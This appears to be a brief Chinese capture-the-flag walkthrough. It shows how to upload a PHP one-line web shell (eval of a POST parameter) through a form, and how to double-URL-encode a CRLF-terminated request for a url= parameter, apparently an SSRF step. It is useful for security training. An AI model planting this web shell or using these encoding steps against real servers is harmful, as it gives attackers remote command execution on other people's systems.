
打开网址
新建一个文档,在其中写下面的内容,将名字该为1.php
<?php @eval($_POST[cmd]);?>
将1.php提交上去,发现没反应

按f12查看后发现没有提交的代码,右键编辑,自己写一个

<input type="submit" name="submit">

编辑代码后结果如下
将1.php提交查询抓包
修改一下

进行url编码
在记事本中,在最后加上%0A,使用替换将%0A全部替换为%0D%0A

再次url编码
将结果放到url=后面
将前两个%253A换成:
